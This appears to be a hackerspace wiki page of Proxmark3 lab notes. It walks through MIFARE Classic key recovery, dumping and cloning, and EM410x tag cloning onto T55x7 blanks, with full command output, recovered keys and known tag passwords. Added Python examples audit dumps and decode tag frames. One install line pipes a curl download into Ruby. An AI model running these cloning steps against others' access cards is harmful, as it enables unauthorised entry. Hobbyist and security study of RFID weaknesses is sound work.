= Proxmark3
Thanks to Jan we have a Proxmark3, a Proxmark3 Easy and also 2 Chameleons.
The RFID case with the gear, including cards etc., is available from me on request.
The Proxmark3 Easy currently has problems with Legic Prime; this still needs to be debugged.
The matching software is installed on the DL0MUC computer; it needs to be updated at some point (tm).
= Mifare to-do with Jan
At 34c3 we played around with this some more; here are a few more tips
(I'm too lazy to look this up again every time)
* Which card type
hf search
* Check for default keys
hf mf chk *1 ?
== Mifare Cloning
* Find a valid key
proxmark3> hf mf mifare
-------------------------------------------------------------------------
Executing command. Expected execution time: 25sec on average :-)
Press the key on the proxmark3 device to abort both proxmark3 and client.
-------------------------------------------------------------------------
........................
uid(352c1f4c) nt(b30c6cee) par(ba92426af29a2a32) ks(0008090f0e0f070d) nr(00000000)
|diff|{nr} |ks3|ks3^5|parity |
+----+--------+---+-----+---------------+
| 00 |00000000| 0 | 5 |0,1,0,1,1,1,0,1|
| 20 |00000020| 8 | d |0,1,0,0,1,0,0,1|
| 40 |00000040| 9 | c |0,1,0,0,0,0,1,0|
| 60 |00000060| f | a |0,1,0,1,0,1,1,0|
| 80 |00000080| e | b |0,1,0,0,1,1,1,1|
| a0 |000000a0| f | a |0,1,0,1,1,0,0,1|
| c0 |000000c0| 7 | 2 |0,1,0,1,0,1,0,0|
| e0 |000000e0| d | 8 |0,1,0,0,1,1,0,0|
key_count:1
------------------------------------------------------------------
Key found:e251a9da734d
Found valid key:e251a9da734d
proxmark3>
* Using the key found above, recover all the remaining keys (takes a while)
proxmark3> hf mf nested 1 0 A e251a9da734d d
--block no:00 key type:00 key:e2 51 a9 da 73 4d etrans:0
Block shift=0
Testing known keys. Sector count=16
nested...
-----------------------------------------------
uid:352c1f4c len=2 trgbl=0 trgkey=1
-----------------------------------------------
uid:352c1f4c len=2 trgbl=4 trgkey=0
-----------------------------------------------
uid:352c1f4c len=2 trgbl=4 trgkey=1
-----------------------------------------------
uid:352c1f4c len=2 trgbl=8 trgkey=0
Found valid key:06930625f573
-----------------------------------------------
uid:352c1f4c len=2 trgbl=8 trgkey=1
Found valid key:9aeb465f44c9
-----------------------------------------------
uid:352c1f4c len=2 trgbl=12 trgkey=0
Found valid key:3ed2990cc0c3
-----------------------------------------------
uid:352c1f4c len=2 trgbl=12 trgkey=1
Found valid key:f9e3c2b9421a
-----------------------------------------------
uid:352c1f4c len=2 trgbl=16 trgkey=0
-----------------------------------------------
uid:352c1f4c len=2 trgbl=16 trgkey=1
Found valid key:f18ea2dcca6f
-----------------------------------------------
uid:352c1f4c len=2 trgbl=20 trgkey=0
-----------------------------------------------
uid:352c1f4c len=2 trgbl=20 trgkey=1
Found valid key:6f259862ef91
-----------------------------------------------
uid:352c1f4c len=2 trgbl=24 trgkey=0
Found valid key:f0bf64a6bf6a
-----------------------------------------------
uid:352c1f4c len=2 trgbl=24 trgkey=1
-----------------------------------------------
uid:352c1f4c len=2 trgbl=28 trgkey=0
-----------------------------------------------
uid:352c1f4c len=2 trgbl=28 trgkey=1
Found valid key:59039bbc5f20
-----------------------------------------------
uid:352c1f4c len=2 trgbl=32 trgkey=0
-----------------------------------------------
uid:352c1f4c len=2 trgbl=32 trgkey=1
Found valid key:59039bbc5f20
-----------------------------------------------
uid:352c1f4c len=2 trgbl=36 trgkey=0
-----------------------------------------------
uid:352c1f4c len=2 trgbl=36 trgkey=1
Found valid key:d412a41ecb09
-----------------------------------------------
uid:352c1f4c len=2 trgbl=40 trgkey=0
-----------------------------------------------
uid:352c1f4c len=2 trgbl=40 trgkey=1
-----------------------------------------------
uid:352c1f4c len=2 trgbl=44 trgkey=0
Found valid key:d271ff53eeda
-----------------------------------------------
uid:352c1f4c len=2 trgbl=44 trgkey=1
Found valid key:b6ca78eabb2a
-----------------------------------------------
uid:352c1f4c len=2 trgbl=48 trgkey=0
Found valid key:cb87a64088e7
-----------------------------------------------
uid:352c1f4c len=2 trgbl=48 trgkey=1
Found valid key:0653bf2b8701
-----------------------------------------------
uid:352c1f4c len=2 trgbl=52 trgkey=0
-----------------------------------------------
uid:352c1f4c len=2 trgbl=52 trgkey=1
Found valid key:541550280d7e
-----------------------------------------------
uid:352c1f4c len=2 trgbl=56 trgkey=0
-----------------------------------------------
uid:352c1f4c len=2 trgbl=56 trgkey=1
-----------------------------------------------
uid:352c1f4c len=2 trgbl=60 trgkey=0
Found valid key:f0bf64a6bf6a
-----------------------------------------------
uid:352c1f4c len=2 trgbl=60 trgkey=1
Found valid key:59039bbc5f20
-----------------------------------------------
uid:352c1f4c len=2 trgbl=0 trgkey=1
Found valid key:322c9cbbe53f
-----------------------------------------------
uid:352c1f4c len=2 trgbl=4 trgkey=0
Found valid key:9c8c07c9f190
-----------------------------------------------
uid:352c1f4c len=2 trgbl=4 trgkey=1
-----------------------------------------------
uid:352c1f4c len=2 trgbl=16 trgkey=0
Found valid key:5ed4f3654421
-----------------------------------------------
uid:352c1f4c len=2 trgbl=20 trgkey=0
-----------------------------------------------
uid:352c1f4c len=2 trgbl=24 trgkey=1
-----------------------------------------------
uid:352c1f4c len=2 trgbl=28 trgkey=0
-----------------------------------------------
uid:352c1f4c len=2 trgbl=32 trgkey=0
-----------------------------------------------
uid:352c1f4c len=2 trgbl=36 trgkey=0
-----------------------------------------------
uid:352c1f4c len=2 trgbl=40 trgkey=0
Found valid key:9dec238a9214
-----------------------------------------------
uid:352c1f4c len=2 trgbl=40 trgkey=1
Found valid key:bd451e445aed
-----------------------------------------------
uid:352c1f4c len=2 trgbl=52 trgkey=0
-----------------------------------------------
uid:352c1f4c len=2 trgbl=56 trgkey=0
Found valid key:472a6f5519ad
-----------------------------------------------
uid:352c1f4c len=2 trgbl=56 trgkey=1
-----------------------------------------------
uid:352c1f4c len=2 trgbl=4 trgkey=1
-----------------------------------------------
uid:352c1f4c len=2 trgbl=20 trgkey=0
Found valid key:cfea5408a6da
-----------------------------------------------
uid:352c1f4c len=2 trgbl=24 trgkey=1
-----------------------------------------------
uid:352c1f4c len=2 trgbl=28 trgkey=0
-----------------------------------------------
uid:352c1f4c len=2 trgbl=32 trgkey=0
Found valid key:f0bf64a6bf6a
-----------------------------------------------
uid:352c1f4c len=2 trgbl=36 trgkey=0
-----------------------------------------------
uid:352c1f4c len=2 trgbl=52 trgkey=0
Found valid key:a6d80a83ded6
-----------------------------------------------
uid:352c1f4c len=2 trgbl=56 trgkey=1
-----------------------------------------------
uid:352c1f4c len=2 trgbl=4 trgkey=1
-----------------------------------------------
uid:352c1f4c len=2 trgbl=24 trgkey=1
-----------------------------------------------
uid:352c1f4c len=2 trgbl=28 trgkey=0
Found valid key:f0bf64a6bf6a
-----------------------------------------------
uid:352c1f4c len=2 trgbl=36 trgkey=0
Found valid key:8f0e6a510598
-----------------------------------------------
uid:352c1f4c len=2 trgbl=56 trgkey=1
Found valid key:f3be399eba7b
-----------------------------------------------
uid:352c1f4c len=2 trgbl=4 trgkey=1
-----------------------------------------------
uid:352c1f4c len=2 trgbl=24 trgkey=1
Found valid key:59039bbc5f20
-----------------------------------------------
uid:352c1f4c len=2 trgbl=4 trgkey=1
-----------------------------------------------
uid:352c1f4c len=2 trgbl=4 trgkey=1
Found valid key:5a6041c9f9fc
Time in nested: 37,380 (0,603 sec per key)
-----------------------------------------------
Iterations count: 62
|---|----------------|---|----------------|---|
|sec|key A |res|key B |res|
|---|----------------|---|----------------|---|
|000| e251a9da734d | 1 | 322c9cbbe53f | 1 |
|001| 9c8c07c9f190 | 1 | 5a6041c9f9fc | 1 |
|002| 06930625f573 | 1 | 9aeb465f44c9 | 1 |
|003| 3ed2990cc0c3 | 1 | f9e3c2b9421a | 1 |
|004| 5ed4f3654421 | 1 | f18ea2dcca6f | 1 |
|005| cfea5408a6da | 1 | 6f259862ef91 | 1 |
|006| f0bf64a6bf6a | 1 | 59039bbc5f20 | 1 |
|007| f0bf64a6bf6a | 1 | 59039bbc5f20 | 1 |
|008| f0bf64a6bf6a | 1 | 59039bbc5f20 | 1 |
|009| 8f0e6a510598 | 1 | d412a41ecb09 | 1 |
|010| 9dec238a9214 | 1 | bd451e445aed | 1 |
|011| d271ff53eeda | 1 | b6ca78eabb2a | 1 |
|012| cb87a64088e7 | 1 | 0653bf2b8701 | 1 |
|013| a6d80a83ded6 | 1 | 541550280d7e | 1 |
|014| 472a6f5519ad | 1 | f3be399eba7b | 1 |
|015| f0bf64a6bf6a | 1 | 59039bbc5f20 | 1 |
|---|----------------|---|----------------|---|
Printing keys to bynary file dumpkeys.bin...
proxmark3>
* Dump the card contents using the recovered keys
proxmark3> hf mf dump
|-----------------------------------------|
|------ Reading sector access bits...-----|
|-----------------------------------------|
#db# READ BLOCK FINISHED
|-----------------------------------------|
|----- Dumping all blocks to file... -----|
|-----------------------------------------|
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
proxmark3>
* Convert the resulting dump to eml format (the PM3 scripts are in the Downloads section at the end of the page)
user@host:~$ ./pm3_bin2eml.py dumpdata.bin dumpdata.eml
* Load the eml file onto a "Magic Chinese Guy" card (place it on the Proxmark first, of course!)
proxmark3> hf mf cload dumpdata
Loaded from file: dumpdata.eml
proxmark3>
* Done
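The key table above shows the same key A (f0bf64a6bf6a) and key B (59039bbc5f20) in sectors 006, 007, 008 and 015, so one recovered key opens several sectors. As an added example (not part of the original page or of the Proxmark client), this Python sketch audits a 1K image for such shared keys and validates each sector trailer's access bits. It assumes a 64-block image of 16 bytes per block with both keys stored in every trailer; the sample image and all function names are constructed for illustration.

```python
from collections import defaultdict

BLOCK, PER_SECTOR, SECTORS = 16, 4, 16  # MIFARE Classic 1K geometry

def decode_access_bits(trailer: bytes):
    """Return (C1, C2, C3) for blocks 0..3 of one sector."""
    b6, b7, b8 = trailer[6], trailer[7], trailer[8]
    c1, c2, c3 = b7 >> 4, b8 & 0x0F, b8 >> 4
    # Every nibble is stored a second time inverted; a mismatch means the
    # access conditions are corrupt and must not be trusted.
    if ((b6 & 0x0F) != (~c1 & 0x0F) or (b6 >> 4) != (~c2 & 0x0F)
            or (b7 & 0x0F) != (~c3 & 0x0F)):
        raise ValueError("access bits fail the inverted-copy check")
    return [((c1 >> i) & 1, (c2 >> i) & 1, (c3 >> i) & 1) for i in range(4)]

def parse_dump(image: bytes):
    """Split a 1K image into per-sector keys and access conditions."""
    if len(image) != BLOCK * PER_SECTOR * SECTORS:
        raise ValueError("expected a 1024-byte MIFARE Classic 1K image")
    sectors = []
    for s in range(SECTORS):
        off = (s * PER_SECTOR + PER_SECTOR - 1) * BLOCK  # trailer = last block
        t = image[off:off + BLOCK]
        sectors.append({"sector": s, "key_a": t[:6].hex(),
                        "key_b": t[10:].hex(),
                        "access": decode_access_bits(t)})
    return sectors

def shared_keys(sectors):
    """Map each key used by more than one sector to those sectors."""
    seen = defaultdict(set)
    for s in sectors:
        seen[s["key_a"]].add(s["sector"])
        seen[s["key_b"]].add(s["sector"])
    return {k: sorted(v) for k, v in seen.items() if len(v) > 1}

def build_sample():
    """Constructed image: per-sector keys, except sectors 6 and 7 share key A."""
    image = bytearray()
    for s in range(SECTORS):
        key_a = (bytes.fromhex("a0a1a2a3a4a5") if s in (6, 7)
                 else bytes([0xA0, s, 0, 0, 0, 0]))
        key_b = bytes([0xB0, s, 0, 0, 0, 0])
        # 3 empty data blocks, then trailer: key A | access bits + GPB | key B
        image += bytes(48) + key_a + bytes.fromhex("ff078069") + key_b
    return bytes(image)

if __name__ == "__main__":
    report = parse_dump(build_sample())
    print(shared_keys(report))    # keys reused across sectors
    print(report[0]["access"])    # access conditions of sector 0
```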
== EM410x Cloning
* Read the card
proxmark3> lf em4x em410xwatch
#db# buffer samples: d1 cd c5 c0 ba b7 b2 af ...
Reading 16000 samples
Done!
Auto-detected clock rate: 64
EM410x Tag ID: 0101160061
Unique Tag ID: 0808860068
proxmark3>
* Write the UID (here: EM410x Tag ID) to a blank card (T5555 or T55x7)
proxmark3> lf em4x em410xwrite 0101160061 1
Writing T55x7 tag with UID 0x0101160061 (clock rate: 64)
#db# Started writing T55x7 tag ...
#db# Clock rate: 64
#db# Tag T55x7 written with 0xff806018d8003060
* Done
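The 64-bit value in the write log above (0xff806018d8003060) is the complete EM410x frame: nine header 1-bits, ten rows of four ID bits plus an even row-parity bit, four column-parity bits and a stop bit. It carries an ID and parity only, with no secret, which is why reading the ID is enough to reproduce the tag. As an added example (not from the original page or the Proxmark client; function names are constructed), this Python decoder validates such a frame and recovers both ID forms shown in the read log.

```python
def decode_em410x(frame: int) -> str:
    """Validate a 64-bit EM410x frame and return the 10-digit hex tag ID."""
    bits = [(frame >> (63 - i)) & 1 for i in range(64)]  # MSB first
    if bits[:9] != [1] * 9:
        raise ValueError("missing header of nine 1-bits")
    if bits[63] != 0:
        raise ValueError("stop bit is not 0")
    # Ten rows of 5 bits: 4 data bits followed by an even-parity bit.
    rows = [bits[9 + 5 * r: 14 + 5 * r] for r in range(10)]
    for r, row in enumerate(rows):
        if sum(row) % 2:
            raise ValueError(f"row {r}: even parity check failed")
    # Bits 59..62 hold even parity over each of the four data columns.
    for c in range(4):
        if (sum(row[c] for row in rows) + bits[59 + c]) % 2:
            raise ValueError(f"column {c}: even parity check failed")
    digits = []
    for row in rows:
        nibble = (row[0] << 3) | (row[1] << 2) | (row[2] << 1) | row[3]
        digits.append(f"{nibble:X}")
    return "".join(digits)


def reverse_nibble(n: int) -> int:
    """Reverse the bit order of a 4-bit value (0b0001 -> 0b1000)."""
    return ((n & 1) << 3) | ((n & 2) << 1) | ((n & 4) >> 1) | ((n & 8) >> 3)


def unique_id(tag_id: str) -> str:
    """Bit-reverse every hex digit; reproduces the 'Unique Tag ID' line."""
    return "".join(f"{reverse_nibble(int(d, 16)):X}" for d in tag_id)


if __name__ == "__main__":
    frame = 0xFF806018D8003060           # value from the write log above
    tag = decode_em410x(frame)
    print(tag, unique_id(tag))
```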
== EM410x Known Passwords
0x51243648
0x000D8787
lf t55xx writeblockPWD 00148041 0 51243648
== Downloads
* {{::prox.rar|}} (source: http://www.fuzzysecurity.com/)
* Proxmark-Firmware/Client, etc.: https://code.google.com/p/proxmark3/wiki/Linux
== Jan's Mac Debugging
* Homebrew install (run in a terminal window)
/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
* Proxmark install
brew tap proxmark/proxmark3
brew install proxmark3
Currently broken (as of 15.1.2018); in that case install with this parameter.
brew install --HEAD proxmark3
* Find the TTY port (connect the Proxmark3 first)
ls /dev/cu*
* Start (it was usbmodem21 for me, adjust accordingly)
proxmark3 /dev/cu.usbmodem21
* From here on, all Proxmark commands work as usual
== Debugging
=== Make errors on Ubuntu (among others)
Change this in client/Makefile:
CXXFLAGS = $(shell pkg-config --cflags QtCore QtGui 2>/dev/null) -Wall -O4
QTLDLIBS = $(shell pkg-config --libs QtCore QtGui 2>/dev/null)
MOC = /usr/lib/x86_64-linux-gnu/qt4/bin/moc